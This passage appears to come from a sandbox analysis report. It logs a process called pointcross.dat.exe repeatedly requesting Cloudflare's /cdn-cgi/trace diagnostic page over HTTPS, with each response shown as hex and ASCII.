0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 09:12:32 GMTContent-Type: text/plainTransfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *Server: cloudflareCF-RAY: 82c940053edf05e7-IADX-Frame-Options: DENYX-Content-Type-Options:
2023-11-27 09:12:32 UTC	217	IN	Data Raw: 64 33 0d 0a 66 6c 3d 33 35 32 66 35 34 0a 68 3d 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0a 69 70 3d 38 39 2e 31 34 39 2e 31 38 2e 36 30 0a 74 73 3d 31 37 30 31 30 37 36 33 35 32 2e 38 33 32 0a 76 69 73 69 74 5f 73 63 68 65 6d 65 3d 68 74 74 70 73 0a 75 61 67 3d 47 6f 2d 68 74 74 70 2d 63 6c 69 65 6e 74 2f 31 2e 31 0a 63 6f 6c 6f 3d 49 41 44 0a 73 6c 69 76 65 72 3d 6e 6f 6e 65 0a 68 74 74 70 3d 68 74 74 70 2f 31 2e 31 0a 6c 6f 63 3d 55 53 0a 74 6c 73 3d 54 4c 53 76 31 2e 33 0a 73 6e 69 3d 70 6c 61 69 6e 74 65 78 74 0a 77 61 72 70 3d 6f 66 66 0a 67 61 74 65 77 61 79 3d 6f 66 66 0a 72 62 69 3d 6f 66 66 0a 6b 65 78 3d 58 32 35 35 31 39 0a 0d 0a Data Ascii: d3fl=352f54h=cloudflare.comip=89.149.18.60ts=1701076352.832visit_scheme=httpsuag=Go-http-client/1.1colo=IADsliver=nonehttp=http/1.1loc=UStls=TLSv1.3sni=plaintextwarp=offgateway=offrbi=offkex=X25519
2023-11-27 09:12:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49747	104.16.133.229	443	6684	C:\Users\user\Desktop\pointcross.dat.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-27 09:12:36 UTC	108	OUT	GET /cdn-cgi/trace HTTP/1.1 Host: cloudflare.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2023-11-27 09:12:36 UTC	332	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 39 3a 31 32 3a 33 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 32 63 39 34 30 31 64 66 62 64 34 31 33 31 38 2d 49 41 44 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 44 45 4e 59 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 09:12:36 GMTContent-Type: text/plainTransfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *Server: cloudflareCF-RAY: 82c9401dfbd41318-IADX-Frame-Options: DENYX-Content-Type-Options:
2023-11-27 09:12:36 UTC	218	IN	Data Raw: 64 34 0d 0a 66 6c 3d 31 36 66 31 31 33 35 0a 68 3d 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0a 69 70 3d 38 39 2e 31 34 39 2e 31 38 2e 36 30 0a 74 73 3d 31 37 30 31 30 37 36 33 35 36 2e 37 39 38 0a 76 69 73 69 74 5f 73 63 68 65 6d 65 3d 68 74 74 70 73 0a 75 61 67 3d 47 6f 2d 68 74 74 70 2d 63 6c 69 65 6e 74 2f 31 2e 31 0a 63 6f 6c 6f 3d 49 41 44 0a 73 6c 69 76 65 72 3d 6e 6f 6e 65 0a 68 74 74 70 3d 68 74 74 70 2f 31 2e 31 0a 6c 6f 63 3d 55 53 0a 74 6c 73 3d 54 4c 53 76 31 2e 33 0a 73 6e 69 3d 70 6c 61 69 6e 74 65 78 74 0a 77 61 72 70 3d 6f 66 66 0a 67 61 74 65 77 61 79 3d 6f 66 66 0a 72 62 69 3d 6f 66 66 0a 6b 65 78 3d 58 32 35 35 31 39 0a 0d 0a Data Ascii: d4fl=16f1135h=cloudflare.comip=89.149.18.60ts=1701076356.798visit_scheme=httpsuag=Go-http-client/1.1colo=IADsliver=nonehttp=http/1.1loc=UStls=TLSv1.3sni=plaintextwarp=offgateway=offrbi=offkex=X25519
2023-11-27 09:12:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49748	104.16.133.229	443	6684	C:\Users\user\Desktop\pointcross.dat.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-27 09:12:40 UTC	108	OUT	GET /cdn-cgi/trace HTTP/1.1 Host: cloudflare.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2023-11-27 09:12:40 UTC	332	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 39 3a 31 32 3a 34 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 32 63 39 34 30 33 36 63 38 61 62 30 61 61 66 2d 49 41 44 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 44 45 4e 59 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 09:12:40 GMTContent-Type: text/plainTransfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *Server: cloudflareCF-RAY: 82c94036c8ab0aaf-IADX-Frame-Options: DENYX-Content-Type-Options:
2023-11-27 09:12:40 UTC	218	IN	Data Raw: 64 34 0d 0a 66 6c 3d 31 36 66 31 32 32 38 0a 68 3d 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0a 69 70 3d 38 39 2e 31 34 39 2e 31 38 2e 36 30 0a 74 73 3d 31 37 30 31 30 37 36 33 36 30 2e 37 36 36 0a 76 69 73 69 74 5f 73 63 68 65 6d 65 3d 68 74 74 70 73 0a 75 61 67 3d 47 6f 2d 68 74 74 70 2d 63 6c 69 65 6e 74 2f 31 2e 31 0a 63 6f 6c 6f 3d 49 41 44 0a 73 6c 69 76 65 72 3d 6e 6f 6e 65 0a 68 74 74 70 3d 68 74 74 70 2f 31 2e 31 0a 6c 6f 63 3d 55 53 0a 74 6c 73 3d 54 4c 53 76 31 2e 33 0a 73 6e 69 3d 70 6c 61 69 6e 74 65 78 74 0a 77 61 72 70 3d 6f 66 66 0a 67 61 74 65 77 61 79 3d 6f 66 66 0a 72 62 69 3d 6f 66 66 0a 6b 65 78 3d 58 32 35 35 31 39 0a 0d 0a Data Ascii: d4fl=16f1228h=cloudflare.comip=89.149.18.60ts=1701076360.766visit_scheme=httpsuag=Go-http-client/1.1colo=IADsliver=nonehttp=http/1.1loc=UStls=TLSv1.3sni=plaintextwarp=offgateway=offrbi=offkex=X25519
2023-11-27 09:12:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49749	104.16.133.229	443	6684	C:\Users\user\Desktop\pointcross.dat.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-27 09:12:44 UTC	108	OUT	GET /cdn-cgi/trace HTTP/1.1 Host: cloudflare.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2023-11-27 09:12:44 UTC	332	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 39 3a 31 32 3a 34 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 32 63 39 34 30 34 66 38 39 39 63 32 30 30 61 2d 49 41 44 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 44 45 4e 59 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 09:12:44 GMTContent-Type: text/plainTransfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *Server: cloudflareCF-RAY: 82c9404f899c200a-IADX-Frame-Options: DENYX-Content-Type-Options:
2023-11-27 09:12:44 UTC	217	IN	Data Raw: 64 33 0d 0a 66 6c 3d 36 30 31 66 33 30 0a 68 3d 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0a 69 70 3d 38 39 2e 31 34 39 2e 31 38 2e 36 30 0a 74 73 3d 31 37 30 31 30 37 36 33 36 34 2e 37 32 38 0a 76 69 73 69 74 5f 73 63 68 65 6d 65 3d 68 74 74 70 73 0a 75 61 67 3d 47 6f 2d 68 74 74 70 2d 63 6c 69 65 6e 74 2f 31 2e 31 0a 63 6f 6c 6f 3d 49 41 44 0a 73 6c 69 76 65 72 3d 6e 6f 6e 65 0a 68 74 74 70 3d 68 74 74 70 2f 31 2e 31 0a 6c 6f 63 3d 55 53 0a 74 6c 73 3d 54 4c 53 76 31 2e 33 0a 73 6e 69 3d 70 6c 61 69 6e 74 65 78 74 0a 77 61 72 70 3d 6f 66 66 0a 67 61 74 65 77 61 79 3d 6f 66 66 0a 72 62 69 3d 6f 66 66 0a 6b 65 78 3d 58 32 35 35 31 39 0a 0d 0a Data Ascii: d3fl=601f30h=cloudflare.comip=89.149.18.60ts=1701076364.728visit_scheme=httpsuag=Go-http-client/1.1colo=IADsliver=nonehttp=http/1.1loc=UStls=TLSv1.3sni=plaintextwarp=offgateway=offrbi=offkex=X25519
2023-11-27 09:12:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49750	104.16.133.229	443	6684	C:\Users\user\Desktop\pointcross.dat.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-27 09:12:49 UTC	108	OUT	GET /cdn-cgi/trace HTTP/1.1 Host: cloudflare.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2023-11-27 09:12:50 UTC	332	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 39 3a 31 32 3a 35 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 32 63 39 34 30 37 30 62 61 35 30 30 35 66 39 2d 49 41 44 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 44 45 4e 59 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 09:12:50 GMTContent-Type: text/plainTransfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *Server: cloudflareCF-RAY: 82c94070ba5005f9-IADX-Frame-Options: DENYX-Content-Type-Options:
2023-11-27 09:12:50 UTC	217	IN	Data Raw: 64 33 0d 0a 66 6c 3d 35 37 33 66 32 36 0a 68 3d 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0a 69 70 3d 38 39 2e 31 34 39 2e 31 38 2e 36 30 0a 74 73 3d 31 37 30 31 30 37 36 33 37 30 2e 30 34 32 0a 76 69 73 69 74 5f 73 63 68 65 6d 65 3d 68 74 74 70 73 0a 75 61 67 3d 47 6f 2d 68 74 74 70 2d 63 6c 69 65 6e 74 2f 31 2e 31 0a 63 6f 6c 6f 3d 49 41 44 0a 73 6c 69 76 65 72 3d 6e 6f 6e 65 0a 68 74 74 70 3d 68 74 74 70 2f 31 2e 31 0a 6c 6f 63 3d 55 53 0a 74 6c 73 3d 54 4c 53 76 31 2e 33 0a 73 6e 69 3d 70 6c 61 69 6e 74 65 78 74 0a 77 61 72 70 3d 6f 66 66 0a 67 61 74 65 77 61 79 3d 6f 66 66 0a 72 62 69 3d 6f 66 66 0a 6b 65 78 3d 58 32 35 35 31 39 0a 0d 0a Data Ascii: d3fl=573f26h=cloudflare.comip=89.149.18.60ts=1701076370.042visit_scheme=httpsuag=Go-http-client/1.1colo=IADsliver=nonehttp=http/1.1loc=UStls=TLSv1.3sni=plaintextwarp=offgateway=offrbi=offkex=X25519
2023-11-27 09:12:50 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49752	104.16.133.229	443	6684	C:\Users\user\Desktop\pointcross.dat.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-27 09:12:53 UTC	108	OUT	GET /cdn-cgi/trace HTTP/1.1 Host: cloudflare.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2023-11-27 09:12:54 UTC	332	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 39 3a 31 32 3a 35 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 32 63 39 34 30 38 39 39 39 35 62 38 31 61 30 2d 49 41 44 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 44 45 4e 59 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 09:12:54 GMTContent-Type: text/plainTransfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *Server: cloudflareCF-RAY: 82c94089995b81a0-IADX-Frame-Options: DENYX-Content-Type-Options:
2023-11-27 09:12:54 UTC	218	IN	Data Raw: 64 34 0d 0a 66 6c 3d 33 35 34 66 32 31 35 0a 68 3d 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0a 69 70 3d 38 39 2e 31 34 39 2e 31 38 2e 36 30 0a 74 73 3d 31 37 30 31 30 37 36 33 37 34 2e 30 31 32 0a 76 69 73 69 74 5f 73 63 68 65 6d 65 3d 68 74 74 70 73 0a 75 61 67 3d 47 6f 2d 68 74 74 70 2d 63 6c 69 65 6e 74 2f 31 2e 31 0a 63 6f 6c 6f 3d 49 41 44 0a 73 6c 69 76 65 72 3d 6e 6f 6e 65 0a 68 74 74 70 3d 68 74 74 70 2f 31 2e 31 0a 6c 6f 63 3d 55 53 0a 74 6c 73 3d 54 4c 53 76 31 2e 33 0a 73 6e 69 3d 70 6c 61 69 6e 74 65 78 74 0a 77 61 72 70 3d 6f 66 66 0a 67 61 74 65 77 61 79 3d 6f 66 66 0a 72 62 69 3d 6f 66 66 0a 6b 65 78 3d 58 32 35 35 31 39 0a 0d 0a Data Ascii: d4fl=354f215h=cloudflare.comip=89.149.18.60ts=1701076374.012visit_scheme=httpsuag=Go-http-client/1.1colo=IADsliver=nonehttp=http/1.1loc=UStls=TLSv1.3sni=plaintextwarp=offgateway=offrbi=offkex=X25519
2023-11-27 09:12:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49753	104.16.133.229	443	6684	C:\Users\user\Desktop\pointcross.dat.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-27 09:12:57 UTC	108	OUT	GET /cdn-cgi/trace HTTP/1.1 Host: cloudflare.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2023-11-27 09:12:58 UTC	332	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 39 3a 31 32 3a 35 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 32 63 39 34 30 61 32 37 38 65 35 32 64 32 30 2d 49 41 44 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 44 45 4e 59 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 09:12:57 GMTContent-Type: text/plainTransfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *Server: cloudflareCF-RAY: 82c940a278e52d20-IADX-Frame-Options: DENYX-Content-Type-Options:
2023-11-27 09:12:58 UTC	218	IN	Data Raw: 64 34 0d 0a 66 6c 3d 36 30 31 66 31 38 36 0a 68 3d 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0a 69 70 3d 38 39 2e 31 34 39 2e 31 38 2e 36 30 0a 74 73 3d 31 37 30 31 30 37 36 33 37 37 2e 39 39 35 0a 76 69 73 69 74 5f 73 63 68 65 6d 65 3d 68 74 74 70 73 0a 75 61 67 3d 47 6f 2d 68 74 74 70 2d 63 6c 69 65 6e 74 2f 31 2e 31 0a 63 6f 6c 6f 3d 49 41 44 0a 73 6c 69 76 65 72 3d 6e 6f 6e 65 0a 68 74 74 70 3d 68 74 74 70 2f 31 2e 31 0a 6c 6f 63 3d 55 53 0a 74 6c 73 3d 54 4c 53 76 31 2e 33 0a 73 6e 69 3d 70 6c 61 69 6e 74 65 78 74 0a 77 61 72 70 3d 6f 66 66 0a 67 61 74 65 77 61 79 3d 6f 66 66 0a 72 62 69 3d 6f 66 66 0a 6b 65 78 3d 58 32 35 35 31 39 0a 0d 0a Data Ascii: d4fl=601f186h=cloudflare.comip=89.149.18.60ts=1701076377.995visit_scheme=httpsuag=Go-http-client/1.1colo=IADsliver=nonehttp=http/1.1loc=UStls=TLSv1.3sni=plaintextwarp=offgateway=offrbi=offkex=X25519
2023-11-27 09:12:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49754	104.16.133.229	443	6684	C:\Users\user\Desktop\pointcross.dat.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-27 09:13:01 UTC	108	OUT	GET /cdn-cgi/trace HTTP/1.1 Host: cloudflare.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2023-11-27 09:13:02 UTC	332	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 39 3a 31 33 3a 30 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 32 63 39 34 30 62 62 34 61 62 61 32 34 32 33 2d 49 41 44 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 44 45 4e 59 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 09:13:01 GMTContent-Type: text/plainTransfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *Server: cloudflareCF-RAY: 82c940bb4aba2423-IADX-Frame-Options: DENYX-Content-Type-Options:
2023-11-27 09:13:02 UTC	223	IN	Data Raw: 64 39 0d 0a 66 6c 3d 36 30 31 66 31 34 37 0a 68 3d 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0a 69 70 3d 38 39 2e 31 34 39 2e 31 38 2e 36 30 0a 74 73 3d 31 37 30 31 30 37 36 33 38 31 2e 39 36 37 0a 76 69 73 69 74 5f 73 63 68 65 6d 65 3d 68 74 74 70 73 0a 75 61 67 3d 47 6f 2d 68 74 74 70 2d 63 6c 69 65 6e 74 2f 31 2e 31 0a 63 6f 6c 6f 3d 49 41 44 0a 73 6c 69 76 65 72 3d 30 30 35 2d 74 69 65 72 31 0a 68 74 74 70 3d 68 74 74 70 2f 31 2e 31 0a 6c 6f 63 3d 55 53 0a 74 6c 73 3d 54 4c 53 76 31 2e 33 0a 73 6e 69 3d 70 6c 61 69 6e 74 65 78 74 0a 77 61 72 70 3d 6f 66 66 0a 67 61 74 65 77 61 79 3d 6f 66 66 0a 72 62 69 3d 6f 66 66 0a 6b 65 78 3d 58 32 35 35 31 39 0a 0d 0a Data Ascii: d9fl=601f147h=cloudflare.comip=89.149.18.60ts=1701076381.967visit_scheme=httpsuag=Go-http-client/1.1colo=IADsliver=005-tier1http=http/1.1loc=UStls=TLSv1.3sni=plaintextwarp=offgateway=offrbi=offkex=X25519
2023-11-27 09:13:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49755	104.16.133.229	443	6684	C:\Users\user\Desktop\pointcross.dat.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-27 09:13:05 UTC	108	OUT	GET /cdn-cgi/trace HTTP/1.1 Host: cloudflare.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2023-11-27 09:13:06 UTC	332	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 39 3a 31 33 3a 30 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 32 63 39 34 30 64 35 35 61 32 63 30 35 38 63 2d 49 41 44 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 44 45 4e 59 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 09:13:06 GMTContent-Type: text/plainTransfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *Server: cloudflareCF-RAY: 82c940d55a2c058c-IADX-Frame-Options: DENYX-Content-Type-Options:
2023-11-27 09:13:06 UTC	217	IN	Data Raw: 64 33 0d 0a 66 6c 3d 35 37 32 66 32 38 0a 68 3d 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0a 69 70 3d 38 39 2e 31 34 39 2e 31 38 2e 36 30 0a 74 73 3d 31 37 30 31 30 37 36 33 38 36 2e 31 33 35 0a 76 69 73 69 74 5f 73 63 68 65 6d 65 3d 68 74 74 70 73 0a 75 61 67 3d 47 6f 2d 68 74 74 70 2d 63 6c 69 65 6e 74 2f 31 2e 31 0a 63 6f 6c 6f 3d 49 41 44 0a 73 6c 69 76 65 72 3d 6e 6f 6e 65 0a 68 74 74 70 3d 68 74 74 70 2f 31 2e 31 0a 6c 6f 63 3d 55 53 0a 74 6c 73 3d 54 4c 53 76 31 2e 33 0a 73 6e 69 3d 70 6c 61 69 6e 74 65 78 74 0a 77 61 72 70 3d 6f 66 66 0a 67 61 74 65 77 61 79 3d 6f 66 66 0a 72 62 69 3d 6f 66 66 0a 6b 65 78 3d 58 32 35 35 31 39 0a 0d 0a Data Ascii: d3fl=572f28h=cloudflare.comip=89.149.18.60ts=1701076386.135visit_scheme=httpsuag=Go-http-client/1.1colo=IADsliver=nonehttp=http/1.1loc=UStls=TLSv1.3sni=plaintextwarp=offgateway=offrbi=offkex=X25519
2023-11-27 09:13:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49756	104.16.133.229	443	6684	C:\Users\user\Desktop\pointcross.dat.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-27 09:13:09 UTC	108	OUT	GET /cdn-cgi/trace HTTP/1.1 Host: cloudflare.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
